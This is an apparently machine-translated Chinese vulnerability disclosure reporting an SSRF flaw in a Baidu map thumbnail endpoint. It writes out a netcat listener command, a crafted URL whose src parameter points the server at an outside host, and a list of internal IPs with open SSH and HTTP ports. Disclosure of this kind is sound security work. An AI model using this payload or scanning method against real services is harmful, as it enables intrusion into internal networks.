漏洞标题 百度图像服务器的SSRF 相关制造商 百度 漏洞作者 李长歌 提交时间 2016-05-08 09: 53 公共时间 2016-06-25 11: 50 漏洞类型 设计缺陷/逻辑错误 危险等级 高 自我评估等级 10 漏洞状态 制造商已确认 标签标签 设计缺陷/边界旁路,不正确的设计,逻辑错误 漏洞详细信息 NC监视器在您自己的服务器上nc -l -vv 8081 http://webmap1.map.bdimg.com/maps/services/thumbnails?width=215&height=145&quality=120&align=middle,middle&src=http://101.200。**。**: 8081
Clientip显示为Intranet的随机IP 此连接中的src参数受到限制,Intranet地址也可用,并且存在SSRF漏洞。 连接存在访问400状态代码不存在返回200状态代码 漏洞证明: 只需扫描内部网的IP段10.50.40。×端口的打开状态。
10.50.40.4: 22 10.50.40.66: 22 10.50.40.52: 22 10.50.40.67: 22 10.50.40.103: 22 10.50.40.156: 22 10.50.40.234: 22 10.50.40.217: 22
10.50.40.47: 80 10.50.40.55: 80 10.50.40.87: 80 10.50.40.121: 80 当然,您也可以扫描其他漏洞。 修理计划: 修理 版权声明:请注明出处。李长歌@乌云